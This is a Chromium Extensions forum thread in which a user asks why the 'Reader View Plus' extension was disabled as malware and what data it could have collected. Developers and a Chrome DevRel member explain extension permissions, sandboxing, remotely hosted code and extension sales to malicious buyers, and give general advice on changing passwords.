extension malware: reader view plus has been disabled because it contains malware

565 views
Skip to first unread message

dan

unread,
Aug 25, 2021, 7:05:22 PM8/25/21
to Chromium Extensions
hi everyone, simeon asked me to post in here about this extension issue:

last week chrome (mac) gave me a notification saying "this extension may be dangerous" - "reader view plus has been disabled because it contains malware". there was no additional information provided by google as to what kind of malware it was, or what it was doing. 

i have been using this extension for over a year, probably longer, and after getting that notification i was in shock. when i went to search for this extension on the chrome web store, i see that it was removed (only a 404 page left). i googled it and got a cached version of the page, which shows that over 500,000+ people were using it. the cached page shows it was offered by Rebecca Herzog. i think the extensions id was gjhmajellcaeediogokhjjgffojhcnkb but am not 100% sure.

my question is, does google know exactly what kind of malware this extension had, and what it was doing? what behaviour was determined to be malware? this extension had full site access on all sites in it's settings. i am terrified as to what kind of data it could have collected on me and my computer/browsing.

can someone from google please let me know why this was flagged, removed and disabled in chrome, and what data it was collecting, and what the malware was doing?

do i have to change every single one of my passwords on every site i have ever used? do i have to get new credit cards? right now i am thinking worst case scenario where i have to assume everything has been compromised.

any information provided would be greatly appreciated. i can't even tell you how violated this makes you feel, and the thought of this app having collected all my username/passwords, credit cards, and other info is absolutely terrifying. i have not been able to sleep because of this, and i know that there are 500,000+ other people who were using this extension.

thank you!

Vishnu NUK

unread,
Aug 25, 2021, 10:10:56 PM8/25/21
to Chromium Extensions, dan, sim...@chromium.org
Maybe someone at CWS team found a new definition for malware like they did for spam redirect last week.
Otherwise they did something really really wrong using remote code execution. 
instead of showing "404. That’s an error." show something useful like " Extension removed for this or that reason " 

Cuyler Stuwe

unread,
Aug 28, 2021, 7:28:02 PM8/28/21
to Vishnu NUK, Chromium Extensions, dan, sim...@chromium.org
If I were you, I would behave as though all of your username/password combos were compromised.

Even if someone from Google were to tell you which breaches of information they found, would you really have full faith that they found them all? I certainly wouldn't. It would be silly to think that a particular type of data is inherently safe simply because you weren't specifically told that it was compromised.

For any site that requires hardware 2FA (e.g., a YubiKey, etc.), you should generally be safe; The whole idea of 2FA is that a correct username/password combo isn't sufficient alone to compromise your account. If you haven't moved toward this type of security precaution, you probably should.

You should probably behave as though any of your credit cards you used online were also compromised. If you can't remember which ones were used online and which were not, the safest thing would be to replace all of them. With that said, credit card companies generally accept liability for fraudulent transactions (debit cards, OTOH, do not). As a consequence of this liability protection they offer, they generally tend to prevent suspicious transactions (e.g., someone on the other side of the state trying to process an order) and lock up cards that show repeated suspicious activity. Therefore, start with replacing debit cards.

Site hacks and other security breaches are becoming so common that your approach to security should definitely presume that someone out there already has some of your sensitive information anyway. You should never assume that someone doesn't have any of it.

In all reality, what probably happened is that a safe extension was sold to a malicious user. Google is somewhat culpable for this kind of outcome; They've made it fairly difficult to monetize browser extensions ("single-purpose policy" effectively bans advertising, and they just removed the CWS payments API). Many decent extension developers receive good offers to sell high-user-count extensions, and they see this as a way to exit profitably from browser extension development. They rarely consider that perhaps their extension will be used maliciously. Developers' accounts are sometimes hacked, as well (hence Google's new 2FA requirement), and updated by hackers to run malicious code. So, while you should behave as though the code was malicious the entire time, it probably was malicious for only a short while before it was disabled.

--
You received this message because you are subscribed to the Google Groups "Chromium Extensions" group.
To unsubscribe from this group and stop receiving emails from it, send an email to chromium-extens...@chromium.org.
To view this discussion on the web visit https://groups.google.com/a/chromium.org/d/msgid/chromium-extensions/2e5fa567-916d-4b1c-8c0f-44c3e58cb249n%40chromium.org.

Vishnu NUK

unread,
Aug 30, 2021, 12:14:32 AM8/30/21
to Chromium Extensions, salem...@gmail.com, Chromium Extensions, dan, Simeon Vincent, Vishnu NUK
Personally, I got more than 100+ emails asking to sell my little extension with just 60K users and offered Several Thousand USD. So it is true that developers can sell the extension, and the company or people who bought it can do whatever they need with it.
In general, use only a few extensions you really need and make sure it is a popular open-source project or developed by a top-rated company with a legally registered business identity. 

dan

unread,
Aug 30, 2021, 3:04:08 PM8/30/21
to Chromium Extensions, salem...@gmail.com, Chromium Extensions, dan, Simeon Vincent, narayanann...@gmail.com
hi, thank you for the reply.

i am waiting to hear from Simeon as he asked me to make a post here about this issue. i would like to know why google remotely disabled this extension, and marked it as malware. they must know what it was doing that made them decide to terminate the extension.

i guess i have no choice but to change all passwords, which will take weeks to do.

you said "while you should behave as though the code was malicious the entire time, it probably was malicious for only a short while before it was disabled" -- the odd thing is that this extension was last updated October 27, 2020 (v 0.3.8). that was the version installed on my computer, and looking at the google search cached page for this extension on the Chrome Web Store, it shows this was the last version available.

so it hasn't been updated in almost a year. 500,000+ people had downloaded this extension... so i would assume that whatever malware was in this extension was there since at least last October 2020 if the extension hasn't been updated since then.

so more questions. hopefully Simeon can let me know exactly what happened. this is literally my worst nightmare.

Cuyler Stuwe

unread,
Aug 30, 2021, 3:08:31 PM8/30/21
to dan, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com
Where are you getting this information about when it was last updated on the CWS? The cached page? That’s likely out-of-date.

Alexei Miagkov

unread,
Aug 30, 2021, 4:09:26 PM8/30/21
to Cuyler Stuwe, dan, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com

Cuyler Stuwe

unread,
Aug 30, 2021, 6:22:12 PM8/30/21
to Chromium Extensions, Alex, dan, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com, Cuyler Stuwe
What makes you so certain that website grabbed information from the latest update before it was pulled from the store?

Simeon Vincent

unread,
Aug 30, 2021, 9:37:12 PM8/30/21
to Cuyler Stuwe, Chromium Extensions, Alex, dan, narayanann...@gmail.com
Hey Dan,

last week chrome (mac) gave me a notification saying "this extension may be dangerous" - "reader view plus has been disabled because it contains malware". there was no additional information provided by google as to what kind of malware it was, or what it was doing. 

What you've described here matches my understanding of the Chrome Web Store's current enforcement practice for malware. To my knowledge we do not share information related to malware verdicts with the developer, the public, or any other 3rd parties. Unfortunately, this means we cannot provide the information you're after.

While I do not know the specific details of this case, generally speaking the most common way that extensions exploit users and evade our detection is through the use of "remotely hosted code", or code that is retrieved and executed after the extension has been installed. If the extension used remotely hosted code, the authors could change it's behavior whenever they wanted. And because of the nature of remotely hosted code, it's possible that a version of an extension published months or years ago only recently began exploiting users.

To be clear, not all uses of remotely hosted code are malicious. A good number of trustworth extensions use this capability to quickly react when a website they integrate with updates, quickly iterate on features, run A/B tests, and for other legitimate reasons. Ultimately, though, we're disallowing the use of remotely hosted code in Manifest V3 because we feel that the risks outweigh the benefits. 

In the interest of ensuring your own safety, I'd recommend following Cuyler's suggestion to "behave as though all of your username/password combos were compromised."

Simeon - @dotproto
Chrome Extensions DevRel

dan

unread,
Aug 31, 2021, 3:40:21 PM8/31/21
to Chromium Extensions, Simeon Vincent, Chromium Extensions, Alex, dan, narayanann...@gmail.com, salem...@gmail.com
hi simeon, is it possible to find out if the version that i was using 0.3.8 was the one that contained malware, or if a newer version was released and that was the one that was flagged? i had 0.3.8 installed for almost a year. the cached page i saw was showing 0.3.8, but i am wondering if a newer version was released then flagged. is it possible to tell me this or refer me to someone who knows the specific details of this case? 

so basically you are saying that it could have been remotely hosted code that wasn't malicious, but we can't tell you that?

i will have to take a month off work to change 500+ usernames/passwords. this has the potential to totally destroy my life. i am begging you to help me find out a little more information.

so since extensions are sandboxed, worst case scenario it was able to get my username/passwords, any information entered into web forms, browsing history, and cookies. but from my understanding cannot see information in other extensions or access the computers shell/filesystem, or anything outside of chrome?

thank you.

Cuyler Stuwe

unread,
Aug 31, 2021, 4:26:45 PM8/31/21
to dan, Alex, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com
It wouldn’t have been able to see your browsing history unless you explicitly approved the installation of a version that had “history” permissions (you would have accepted the respective prompt).

It may have been able to grab some cookies, but it would have needed the “cookies” permission to grab all types of them. There are HTTP-only cookies that are normally invisible to Javascript running on the context of a page.

I can’t imagine that replacing 500 passwords would demand a whole month away from work, or that it’s “life-ruining”; That seems like an extreme melodramatic exaggeration. As long as you know which sites you need to replace the passwords for, it likely will take between 1-2 very tedious days, at most. Those 1-2 days will suck; I recommend queuing up a playlist of your favorite music to make it more palatable.

To avoid ever having to go through this tedium again, and to bolster your security, I recommend signing up for sites with Google/Facebook/etc. (or other SSO/SAML providers) wherever possible, and then protecting those sign-ins with hardware 2FA (again, YubiKey is a popular choice). This will reduce the number of accounts you need to manage, and will drastically limit the impact of a breach.

Just as with Apple and Microsoft, Google cannot find all malware automatically (If they could, there would be no need for anti-malware companies). Whenever you install an extension with wide-ranging permissions, you implicitly accept the risk inherent to these permissions; That’s why you’re warned of the risks. It’s possible that you may have other malware extensions installed right now whose malicious activity has gone undetected. For extensions that have such powerful capabilities, you should feel certain of who the developer is and that you can trust them.

I hope you resolve this issue as soon and as painlessly as possible, and I hope that it becomes a learning experience that helps you harden your security posture moving forward.

dan

unread,
Aug 31, 2021, 10:51:46 PM8/31/21
to Chromium Extensions, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com, dan
hi Cuyler, thank you so much for your reply, i really appreciate the advice and help.

for this malware extension, the extensions permissions only consisted of "site access", which was set to "allow this extension to read and change all your data on websites you visit" set to "on all sites". there were no other permission settings for this extension. i took a screen shot before removing it. allow in incognito and allow access to file URLs was turned off. 

changing passwords i can deal with, but the most important question i have is: would it be possible for this extension to have seen what was on my MacOS clipboard, any text that i had copied to it, and have gotten that? or if i copied a file in MacOS, then pasted it/or didn't paste it, would this extension have been able to get that file? right now that is my most important concern. do you know the answer to that question?

there was no "history" or "cookies" setting in permissions. i read that extensions are in a sandbox, so my question is, based on the settings i had, would this extension have been able to:

1] access my username/passwords for any website that i logged into? either typing the username/password in manually OR chrome autofilling the username/password, which has the password *** censored. could it see the censored version from autofill? or when you go into settings in chrome and view your passwords?
2] access any information that i would have typed into forms or anywhere else in the web browser (address bar/url entry).
3] see what sites i visited: my history or the current site i am on
4] access cookies (i'm not sure what http only cookies are?). as i said there was no cookies setting in permissions.
5] access the shell or filesystem on MacOS or access any data outside of the chrome application.
6] access any data in other chrome extensions.
7] access what was on the MacOS clipboard (text or a file) and see that data and get it.

currently the extensions i am using are AdBlock, disable HTML5 autoplay, DuckDuckGo Privacy Essentials, Ghostery, GoFullPage screen capture, Google Docs Offline, Google Mail Checker, MetaMask, Privacy Badger, and uBlock Origin. do you have any suggestions about which would be unsafe?

now i'm wondering if that malware extension would have been able to see into MetaMask, as when you put in your seed phrase after installation it opens a browser window called chrome-extension://...home.html#restorevault, where you enter your recovery phrase and create a password for the extension. do you have any idea about this?

once again, i sincerely thank you for your time and help. almost every issue i can deal with, but if it had access to my MacOS clipboard and any text on it, or files i was copying/pasting in the filesystem, that would just be a disaster.

hrg...@gmail.com

unread,
Aug 31, 2021, 11:10:18 PM8/31/21
to Chromium Extensions, dan, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com
The permission  "allow this extension to read and change all your data on websites you visit"  is the <all_urls> permission, which allows an extension to see everything you type on every page you visit, with the exception of protected URLs (chrome://, chrome-extension://, the CWS,  and a few others).

It's no exaggeration that the permission is shown to the users with the phrase "read and change ALL your data".

Vishnu NUK

unread,
Sep 1, 2021, 12:30:32 PM9/1/21
to Chromium Extensions, dan, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, Vishnu NUK
Try uBlock Origin. uBlock Origin is not an "ad blocker", it's a wide-spectrum content blocker with CPU and memory efficiency as a primary feature.

dan

unread,
Sep 1, 2021, 3:21:09 PM9/1/21
to Chromium Extensions, narayanann...@gmail.com, dan, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent
hello, i have been using uBlock Origin for years.

my main concern right now is if the malware extension i had was able to view my clipboard and access the data on it [text/files]. does anyone know the answer to this?

dan

unread,
Sep 3, 2021, 2:43:05 PM9/3/21
to Chromium Extensions, hrg...@gmail.com, dan, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, narayanann...@gmail.com
hi Cuyler/Simeon or anyone else that knows: would it be possible for a chrome extension (and specifically the one i had that was flagged as malware) to access the shell or filesystem of a Mac, or see/access what is on the MacOS clipboard [text or files that i have copied] and get that data? or access information in another extension?

Cuyler, in your original message you said that "it probably was malicious for only a short while before it was disabled." ... can you give an estimate of how short a time you think that would be? 1 day? 1 week? 2 weeks?

i am trying to see what the worst case scenario is besides getting username/passwords. if anyone knows the answer to these questions i would really appreciate it. i read that extensions are in a sandbox, but don't know exactly what that means.

thank you.

Cuyler Stuwe

unread,
Sep 3, 2021, 2:45:12 PM9/3/21
to dan, Alex, Chromium Extensions, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com
With the permissions it seems to have had, it wouldn’t have been able to arbitrarily access your filesystem without outside assistance.

Similar with clipboard.

dan

unread,
Sep 4, 2021, 8:03:51 PM9/4/21
to Chromium Extensions, salem...@gmail.com, Alex, Chromium Extensions, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com, dan
thank you for the reply. what does outside assistance mean?

i actually had the extension turned off for a week or two before it was flagged as malware as well.... so i think i am ok, but will change all passwords just to be safe.

i just wish i knew how long it was malicious before being remotely disabled, you said probably for a short while of time. i guess you don't know how long that could possibly be, days or a week or two? how fast can google find out extensions have malware in them?

thank you again for the help, it really means a lot to me.

Cuyler Stuwe

unread,
Sep 4, 2021, 8:20:43 PM9/4/21
to dan, Chromium Extensions, Alex, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com
By "outside assistance", I mean just that -- other people and/or software.

One conceivable example might be insecure software running locally that exposes localhost connections for configuration.

For example, the software for one of my mice runs a localhost server for programmatic control of its lights and vibration features. If you suppose that this software was written carelessly (so that it could accidentally affect the local filesystem somehow), anything that could communicate with it (e.g., an extension) could exploit this vulnerability.

Another example: Let's just suppose that there's a bug in Chrome causing an unintended vulnerability (wouldn't be even close to the first time).

In other words, it's an unlikely scenario, but plausible.

dan

unread,
Sep 5, 2021, 7:34:33 PM9/5/21
to Chromium Extensions, salem...@gmail.com, Chromium Extensions, Alex, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com, dan
thank you for the info. you said it was probably only malicious for a short time -- i guess you don't know how long that could possibly be, days or a week or two? how fast can google find out extensions have malware in them?

dan

unread,
Sep 7, 2021, 9:27:55 PM9/7/21
to Chromium Extensions, dan, salem...@gmail.com, Chromium Extensions, Alex, Simeon Vincent, hrg...@gmail.com, narayanann...@gmail.com
hey Cuyler/everyone: one thing i just noticed is that when Chrome remotely disables an extension, i believe it removes all permissions from the listed permissions -- i have a screenshot of the malware extension that was disabled, but under permissions it's blank, there is nothing there and it doesn't say "no permissions" or anything, just completely blank, and no room for anything to even be listed as there is a line under the word permissions, then 'site access' listed under that line.

i would assume that when i installed this 'reader view plus' extension i didn't grant it any special filesystem or clipboard permissions. 

most extensions that have "allow this extension to read and change all your data on websites you visit" set to "all sites" that i have installed just have "allow this extension to read your browsing history" under permissions and nothing else.

i guess i will never know what permissions it had enabled, or what data it collected. i really just wish i knew how long it was malicious for. 

Simeon Vincent

unread,
Sep 9, 2022, 3:04:47 PM9/9/22
to MASAHIKO HOSI, acc...@visatmonlie.com, Chromium Extensions, dan, salem...@gmail.com, Alex, narayanann...@gmail.com
It wouldn’t have been able to see your browsing history unless you explicitly approved the installation of a version that had “history” permissions (you would have accepted the respective prompt).

FYI, the "tabs" permission also displays a warning message that says the extension can  "Read your browsing history". An extension that requests the tabs permission can use the tabs.onUpdated event to collect the tab URL of every page the user visits and therefore over time can collect the user's browsing history.

now i'm wondering if that malware extension would have been able to see into MetaMask, as when you put in your seed phrase after installation it opens a browser window called chrome-extension://...home.html#restorevault, where you enter your recovery phrase and create a password for the extension. do you have any idea about this?
 
Extensions are not able to directly interact with the contents of another extension's page. For example, while extnsions can inject scripts onto a site like example.com, they cannot inject scripts into a page opened to chrome-extensinos://EXTENSION_ID/index.html. I can't think of a way that the offending extension would have been able to get the recovery phrase or password you mentioned.

thank you for the info. you said it was probably only malicious for a short time -- i guess you don't know how long that could possibly be, days or a week or two? how fast can google find out extensions have malware in them?

The short answer is "it depends." In some cases we take action against extensions before they're ever listed in the store. In others, internal investigations or external reports surface the fact that an item publicly listed in the store is doing something nefarious. Depending on how the extension is built, it may be impossible to determine how long the extension has been exploiting users because the extension itself doesn't contain that code.

Even if the malicious code is baked into the extension, it may not be possible for you to determine how long the offending code has been in the extension because the Chrome Web Store basically only knows about two versions of an extension: the currently published version and a draft that has yet to be submitted, and the draft is not publicly accessible.  

As Cuyler said, in many cases what happens is "a safe extension was sold to a malicious user". Then, after the sale the new owner adds code to the extension to collect the user's browsing history (high value, low hanging fruit) without their knowledge, without disclosing this behavior, and in violation of Chrome Web Store policy. Once we hear about it we investigate and take corrective action. Unfortunately I can't share (and therefore avoid learning in the first place) detailed information about the internals of the review process. As a result, I have no idea how much time passes on average between the new code addition and corrective action.

Simeon - @dotproto
Chrome Extensions DevRel


On Wed, Aug 31, 2022 at 9:51 AM MASAHIKO HOSI <zhengya...@gmail.com> wrote:


2021年9月1日(水) 12:10 hrg...@gmail.com <hrg...@gmail.com>:
Reply all
Reply to author
Forward
0 new messages